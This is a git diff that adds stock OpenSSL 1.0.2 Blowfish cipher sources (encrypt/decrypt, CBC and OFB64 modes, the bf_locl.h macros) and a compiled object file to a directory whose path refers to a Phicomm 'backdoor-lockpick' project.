+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/blowfish.h>
+#include "bf_locl.h"
+
+/*
+ * Blowfish as implemented from 'Blowfish: Springer-Verlag paper' (From
+ * LECTURE NOTES IN COMPUTER SCIENCE 809, FAST SOFTWARE ENCRYPTION, CAMBRIDGE
+ * SECURITY WORKSHOP, CAMBRIDGE, U.K., DECEMBER 9-11, 1993)
+ */
+
+#if (BF_ROUNDS != 16) && (BF_ROUNDS != 20)
+# error If you set BF_ROUNDS to some value other than 16 or 20, you will have \
+to modify the code.
+#endif
+
+void BF_encrypt(BF_LONG *data, const BF_KEY *key)
+{
+#ifndef BF_PTR2
+    register BF_LONG l, r;
+    register const BF_LONG *p, *s;
+
+    p = key->P;
+    s = &(key->S[0]);
+    l = data[0];
+    r = data[1];
+
+    l ^= p[0];
+    BF_ENC(r, l, s, p[1]);
+    BF_ENC(l, r, s, p[2]);
+    BF_ENC(r, l, s, p[3]);
+    BF_ENC(l, r, s, p[4]);
+    BF_ENC(r, l, s, p[5]);
+    BF_ENC(l, r, s, p[6]);
+    BF_ENC(r, l, s, p[7]);
+    BF_ENC(l, r, s, p[8]);
+    BF_ENC(r, l, s, p[9]);
+    BF_ENC(l, r, s, p[10]);
+    BF_ENC(r, l, s, p[11]);
+    BF_ENC(l, r, s, p[12]);
+    BF_ENC(r, l, s, p[13]);
+    BF_ENC(l, r, s, p[14]);
+    BF_ENC(r, l, s, p[15]);
+    BF_ENC(l, r, s, p[16]);
+# if BF_ROUNDS == 20
+    BF_ENC(r, l, s, p[17]);
+    BF_ENC(l, r, s, p[18]);
+    BF_ENC(r, l, s, p[19]);
+    BF_ENC(l, r, s, p[20]);
+# endif
+    r ^= p[BF_ROUNDS + 1];
+
+    data[1] = l & 0xffffffffL;
+    data[0] = r & 0xffffffffL;
+#else
+    register BF_LONG l, r, t, *k;
+
+    l = data[0];
+    r = data[1];
+    k = (BF_LONG *)key;
+
+    l ^= k[0];
+    BF_ENC(r, l, k, 1);
+    BF_ENC(l, r, k, 2);
+    BF_ENC(r, l, k, 3);
+    BF_ENC(l, r, k, 4);
+    BF_ENC(r, l, k, 5);
+    BF_ENC(l, r, k, 6);
+    BF_ENC(r, l, k, 7);
+    BF_ENC(l, r, k, 8);
+    BF_ENC(r, l, k, 9);
+    BF_ENC(l, r, k, 10);
+    BF_ENC(r, l, k, 11);
+    BF_ENC(l, r, k, 12);
+    BF_ENC(r, l, k, 13);
+    BF_ENC(l, r, k, 14);
+    BF_ENC(r, l, k, 15);
+    BF_ENC(l, r, k, 16);
+# if BF_ROUNDS == 20
+    BF_ENC(r, l, k, 17);
+    BF_ENC(l, r, k, 18);
+    BF_ENC(r, l, k, 19);
+    BF_ENC(l, r, k, 20);
+# endif
+    r ^= k[BF_ROUNDS + 1];
+
+    data[1] = l & 0xffffffffL;
+    data[0] = r & 0xffffffffL;
+#endif
+}
+
+#ifndef BF_DEFAULT_OPTIONS
+
+void BF_decrypt(BF_LONG *data, const BF_KEY *key)
+{
+# ifndef BF_PTR2
+    register BF_LONG l, r;
+    register const BF_LONG *p, *s;
+
+    p = key->P;
+    s = &(key->S[0]);
+    l = data[0];
+    r = data[1];
+
+    l ^= p[BF_ROUNDS + 1];
+#  if BF_ROUNDS == 20
+    BF_ENC(r, l, s, p[20]);
+    BF_ENC(l, r, s, p[19]);
+    BF_ENC(r, l, s, p[18]);
+    BF_ENC(l, r, s, p[17]);
+#  endif
+    BF_ENC(r, l, s, p[16]);
+    BF_ENC(l, r, s, p[15]);
+    BF_ENC(r, l, s, p[14]);
+    BF_ENC(l, r, s, p[13]);
+    BF_ENC(r, l, s, p[12]);
+    BF_ENC(l, r, s, p[11]);
+    BF_ENC(r, l, s, p[10]);
+    BF_ENC(l, r, s, p[9]);
+    BF_ENC(r, l, s, p[8]);
+    BF_ENC(l, r, s, p[7]);
+    BF_ENC(r, l, s, p[6]);
+    BF_ENC(l, r, s, p[5]);
+    BF_ENC(r, l, s, p[4]);
+    BF_ENC(l, r, s, p[3]);
+    BF_ENC(r, l, s, p[2]);
+    BF_ENC(l, r, s, p[1]);
+    r ^= p[0];
+
+    data[1] = l & 0xffffffffL;
+    data[0] = r & 0xffffffffL;
+# else
+    register BF_LONG l, r, t, *k;
+
+    l = data[0];
+    r = data[1];
+    k = (BF_LONG *)key;
+
+    l ^= k[BF_ROUNDS + 1];
+#  if BF_ROUNDS == 20
+    BF_ENC(r, l, k, 20);
+    BF_ENC(l, r, k, 19);
+    BF_ENC(r, l, k, 18);
+    BF_ENC(l, r, k, 17);
+#  endif
+    BF_ENC(r, l, k, 16);
+    BF_ENC(l, r, k, 15);
+    BF_ENC(r, l, k, 14);
+    BF_ENC(l, r, k, 13);
+    BF_ENC(r, l, k, 12);
+    BF_ENC(l, r, k, 11);
+    BF_ENC(r, l, k, 10);
+    BF_ENC(l, r, k, 9);
+    BF_ENC(r, l, k, 8);
+    BF_ENC(l, r, k, 7);
+    BF_ENC(r, l, k, 6);
+    BF_ENC(l, r, k, 5);
+    BF_ENC(r, l, k, 4);
+    BF_ENC(l, r, k, 3);
+    BF_ENC(r, l, k, 2);
+    BF_ENC(l, r, k, 1);
+    r ^= k[0];
+
+    data[1] = l & 0xffffffffL;
+    data[0] = r & 0xffffffffL;
+# endif
+}
+
+void BF_cbc_encrypt(const unsigned char *in, unsigned char *out, long length,
+                    const BF_KEY *schedule, unsigned char *ivec, int encrypt)
+{
+    register BF_LONG tin0, tin1;
+    register BF_LONG tout0, tout1, xor0, xor1;
+    register long l = length;
+    BF_LONG tin[2];
+
+    if (encrypt) {
+        n2l(ivec, tout0);
+        n2l(ivec, tout1);
+        ivec -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            n2l(in, tin0);
+            n2l(in, tin1);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            BF_encrypt(tin, schedule);
+            tout0 = tin[0];
+            tout1 = tin[1];
+            l2n(tout0, out);
+            l2n(tout1, out);
+        }
+        if (l != -8) {
+            n2ln(in, tin0, tin1, l + 8);
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+            tin[0] = tin0;
+            tin[1] = tin1;
+            BF_encrypt(tin, schedule);
+            tout0 = tin[0];
+            tout1 = tin[1];
+            l2n(tout0, out);
+            l2n(tout1, out);
+        }
+        l2n(tout0, ivec);
+        l2n(tout1, ivec);
+    } else {
+        n2l(ivec, xor0);
+        n2l(ivec, xor1);
+        ivec -= 8;
+        for (l -= 8; l >= 0; l -= 8) {
+            n2l(in, tin0);
+            n2l(in, tin1);
+            tin[0] = tin0;
+            tin[1] = tin1;
+            BF_decrypt(tin, schedule);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2n(tout0, out);
+            l2n(tout1, out);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        if (l != -8) {
+            n2l(in, tin0);
+            n2l(in, tin1);
+            tin[0] = tin0;
+            tin[1] = tin1;
+            BF_decrypt(tin, schedule);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            l2nn(tout0, tout1, out, l + 8);
+            xor0 = tin0;
+            xor1 = tin1;
+        }
+        l2n(xor0, ivec);
+        l2n(xor1, ivec);
+    }
+    tin0 = tin1 = tout0 = tout1 = xor0 = xor1 = 0;
+    tin[0] = tin[1] = 0;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..48f8c999666cfa30f8005cec82682fd54383ed6c
GIT binary patch
literal 5392
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
VJAU|Y%4YJj;{1miWRY~s{{<y9`p^IX

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_locl.h
new file mode 100644
index 0000000..9448aed
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_locl.h
@@ -0,0 +1,221 @@
+/* crypto/bf/bf_locl.h */
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_BF_LOCL_H
+# define HEADER_BF_LOCL_H
+# include <openssl/opensslconf.h>/* BF_PTR, BF_PTR2 */
+
+# undef c2l
+# define c2l(c,l)        (l =((unsigned long)(*((c)++)))    , \
+                         l|=((unsigned long)(*((c)++)))<< 8L, \
+                         l|=((unsigned long)(*((c)++)))<<16L, \
+                         l|=((unsigned long)(*((c)++)))<<24L)
+
+/* NOTE - c is not incremented as per c2l */
+# undef c2ln
+# define c2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((unsigned long)(*(--(c))))<<24L; \
+                        case 7: l2|=((unsigned long)(*(--(c))))<<16L; \
+                        case 6: l2|=((unsigned long)(*(--(c))))<< 8L; \
+                        case 5: l2|=((unsigned long)(*(--(c))));     \
+                        case 4: l1 =((unsigned long)(*(--(c))))<<24L; \
+                        case 3: l1|=((unsigned long)(*(--(c))))<<16L; \
+                        case 2: l1|=((unsigned long)(*(--(c))))<< 8L; \
+                        case 1: l1|=((unsigned long)(*(--(c))));     \
+                                } \
+                        }
+
+# undef l2c
+# define l2c(l,c)        (*((c)++)=(unsigned char)(((l)     )&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>24L)&0xff))
+
+/* NOTE - c is not incremented as per l2c */
+# undef l2cn
+# define l2cn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)>>24L)&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>>16L)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>> 8L)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)     )&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)>>24L)&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>>16L)&0xff); \
+                        case 2: *(--(c))=(unsigned char)(((l1)>> 8L)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)     )&0xff); \
+                                } \
+                        }
+
+/* NOTE - c is not incremented as per n2l */
+# define n2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((unsigned long)(*(--(c))))    ; \
+                        case 7: l2|=((unsigned long)(*(--(c))))<< 8; \
+                        case 6: l2|=((unsigned long)(*(--(c))))<<16; \
+                        case 5: l2|=((unsigned long)(*(--(c))))<<24; \
+                        case 4: l1 =((unsigned long)(*(--(c))))    ; \
+                        case 3: l1|=((unsigned long)(*(--(c))))<< 8; \
+                        case 2: l1|=((unsigned long)(*(--(c))))<<16; \
+                        case 1: l1|=((unsigned long)(*(--(c))))<<24; \
+                                } \
+                        }
+
+/* NOTE - c is not incremented as per l2n */
+# define l2nn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)    )&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>> 8)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>>16)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)>>24)&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)    )&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>> 8)&0xff); \
+                        case 2: *(--(c))=(unsigned char)(((l1)>>16)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)>>24)&0xff); \
+                                } \
+                        }
+
+# undef n2l
+# define n2l(c,l)        (l =((unsigned long)(*((c)++)))<<24L, \
+                         l|=((unsigned long)(*((c)++)))<<16L, \
+                         l|=((unsigned long)(*((c)++)))<< 8L, \
+                         l|=((unsigned long)(*((c)++))))
+
+# undef l2n
+# define l2n(l,c)        (*((c)++)=(unsigned char)(((l)>>24L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)     )&0xff))
+
+/*
+ * This is actually a big endian algorithm, the most significant byte is used
+ * to lookup array 0
+ */
+
+# if defined(BF_PTR2)
+
+/*
+ * This is basically a special Intel version. Point is that Intel
+ * doesn't have many registers, but offers a reach choice of addressing
+ * modes. So we spare some registers by directly traversing BF_KEY
+ * structure and hiring the most decorated addressing mode. The code
+ * generated by EGCS is *perfectly* competitive with assembler
+ * implementation!
+ */
+#  define BF_ENC(LL,R,KEY,Pi) (\
+        LL^=KEY[Pi], \
+        t=  KEY[BF_ROUNDS+2 +   0 + ((R>>24)&0xFF)], \
+        t+= KEY[BF_ROUNDS+2 + 256 + ((R>>16)&0xFF)], \
+        t^= KEY[BF_ROUNDS+2 + 512 + ((R>>8 )&0xFF)], \
+        t+= KEY[BF_ROUNDS+2 + 768 + ((R    )&0xFF)], \
+        LL^=t \
+        )
+
+# elif defined(BF_PTR)
+
+#  ifndef BF_LONG_LOG2
+#   define BF_LONG_LOG2  2      /* default to BF_LONG being 32 bits */
+#  endif
+#  define BF_M  (0xFF<<BF_LONG_LOG2)
+#  define BF_0  (24-BF_LONG_LOG2)
+#  define BF_1  (16-BF_LONG_LOG2)
+#  define BF_2  ( 8-BF_LONG_LOG2)
+#  define BF_3  BF_LONG_LOG2    /* left shift */
+
+/*
+ * This is normally very good on RISC platforms where normally you
+ * have to explicitly "multiply" array index by sizeof(BF_LONG)
+ * in order to calculate the effective address. This implementation
+ * excuses CPU from this extra work. Power[PC] uses should have most
+ * fun as (R>>BF_i)&BF_M gets folded into a single instruction, namely
+ * rlwinm. So let'em double-check if their compiler does it.
+ */
+
+#  define BF_ENC(LL,R,S,P) ( \
+        LL^=P, \
+        LL^= (((*(BF_LONG *)((unsigned char *)&(S[  0])+((R>>BF_0)&BF_M))+ \
+                *(BF_LONG *)((unsigned char *)&(S[256])+((R>>BF_1)&BF_M)))^ \
+                *(BF_LONG *)((unsigned char *)&(S[512])+((R>>BF_2)&BF_M)))+ \
+                *(BF_LONG *)((unsigned char *)&(S[768])+((R<<BF_3)&BF_M))) \
+        )
+# else
+
+/*
+ * This is a *generic* version. Seem to perform best on platforms that
+ * offer explicit support for extraction of 8-bit nibbles preferably
+ * complemented with "multiplying" of array index by sizeof(BF_LONG).
+ * For the moment of this writing the list comprises Alpha CPU featuring
+ * extbl and s[48]addq instructions.
+ */
+
+#  define BF_ENC(LL,R,S,P) ( \
+        LL^=P, \
+        LL^=((( S[       ((int)(R>>24)&0xff)] + \
+                S[0x0100+((int)(R>>16)&0xff)])^ \
+                S[0x0200+((int)(R>> 8)&0xff)])+ \
+                S[0x0300+((int)(R    )&0xff)])&0xffffffffL \
+        )
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_ofb64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_ofb64.c
new file mode 100644
index 0000000..a8d190b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_ofb64.c
@@ -0,0 +1,110 @@
+/* crypto/bf/bf_ofb64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/blowfish.h>
+#include "bf_locl.h"
+
+/*
+ * The input and output encrypted as though 64bit ofb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+void BF_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                      long length, const BF_KEY *schedule,
+                      unsigned char *ivec, int *num)
+{
+    register BF_LONG v0, v1, t;
+    register int n = *num;
+    register long l = length;
+    unsigned char d[8];
+    register char *dp;
+    BF_LONG ti[2];
+    unsigned char *iv;
+    int save = 0;
+
+    iv = (unsigned char *)ivec;
+    n2l(iv, v0);
+    n2l(iv, v1);
+    ti[0] = v0;
+    ti[1] = v1;
+    dp = (char *)d;
+    l2n(v0, dp);
+    l2n(v1, dp);
+    while (l--) {
+        if (n == 0) {
+            BF_encrypt((BF_LONG *)ti, schedule);
+            dp = (char *)d;
+            t = ti[0];
+            l2n(t, dp);
+            t = ti[1];
+            l2n(t, dp);
+            save++;
+        }
+        *(out++) = *(in++) ^ d[n];
+        n = (n + 1) & 0x07;
+    }
+    if (save) {
+        v0 = ti[0];
+        v1 = ti[1];
+        iv = (unsigned char *)ivec;
+        l2n(v0, iv);
+        l2n(v1, iv);
+    }
+    t = v0 = v1 = ti[0] = ti[1] = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_ofb64.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_ofb64.o
new file mode 100644
